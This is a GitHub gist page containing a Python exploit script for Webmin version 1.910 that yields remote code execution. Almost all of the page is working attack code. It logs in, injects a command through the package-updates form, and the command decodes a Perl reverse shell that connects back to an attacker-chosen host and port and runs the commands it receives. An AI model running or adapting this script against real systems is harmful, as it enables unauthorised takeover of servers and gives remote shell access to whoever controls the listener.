Skip to content

Instantly share code, notes, and snippets.

@AzraelSec
Created March 14, 2020 20:02
Show Gist options
  • Save AzraelSec/028f0b6c9370f55456c9d2cce3e56a3c to your computer and use it in GitHub Desktop.
Save AzraelSec/028f0b6c9370f55456c9d2cce3e56a3c to your computer and use it in GitHub Desktop.
This is a simple exploit for version 1.910 of Webmin service that leads to Remote Code Execution
#!/usr/bin/python
from requests import post
from urllib import quote
from base64 import b64encode
from requests.packages.urllib3 import disable_warnings
from urllib3.exceptions import InsecureRequestWarning
USER = 'USER'
PASS = 'PASSWORD'
RHOST = 'REMOTE_IP'
RPORT = 'REMOTE_PORT'
LHOST = 'YOUR_IP'
LPORT = 'YOUR_PORT'
SSL = True
PAYLOAD = "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){{if($ENV{{$key}}=~/(.*)/){{$ENV{{$key}}=$1;}}}}$c=new IO::Socket::INET(PeerAddr,\"{}:{}\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){{if($_=~ /(.*)/){{system $1;}}}};'".format(LHOST, LPORT);
PAYLOAD_ENCODED = ('bash -c "{echo,' + b64encode(PAYLOAD) + '}|{base64,-d}|{bash,-i}"')
def base_url():
return '{}://{}:{}/'.format(('https' if SSL else 'http'), RHOST, RPORT)
def login():
params = {'user':USER, 'pass':PASS}
cookies = dict(testing='1', redirect='1', sid='x')
response = post(base_url() + 'session_login.cgi', data=params, cookies=cookies, verify=False, allow_redirects=False)
return response.cookies['sid']
def deliver_payload(sid):
data = "u=acl/apt&u= | {}&ok_top=Update+Selected+Packages".format(PAYLOAD_ENCODED)
cookies = {'sid':sid}
headers = {'content-type': 'application/x-www-form-urlencoded', 'Referer':'{}/package-updates/?xnavigation=1'.format(base_url())}
try:
response = post(base_url() + 'package-updates/update.cgi', cookies=cookies, headers=headers, data=data, verify=False, allow_redirects=False)
except KeyboardInterrupt:
pass
def banner():
print " __ __ _ _ __ ___ __ ___ "
print " \ \ / / | | (_) /_ | / _ \/_ | / _ \ "
print " \ \ /\ / /___ | |__ _ __ ___ _ _ __ ______ | | | (_) || || | | |"
print " \ \/ \/ // _ \| '_ \ | '_ \`_ \ | || '_ \|______|| | \__, || || | | |"
print " \ /\ /| __/| |_) || | | | | || || | | | | | _ / / | || |_| |"
print " \/ \/ \___||_.__/ |_| |_| |_||_||_| |_| |_|(_)/_/ |_| \___/ "
print " "
print " -> coded by AzraelSec (federicogerardi94[at]gmail.com) \n"
if __name__ == '__main__':
banner()
print 'Connecting to {}'.format(base_url())
disable_warnings(category=InsecureRequestWarning)
session_cookie = login()
print 'Cookies forged: {}'.format(session_cookie)
print 'Attacking using this payload: {}'.format(PAYLOAD)
deliver_payload(session_cookie)
print 'Attack completed :)'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment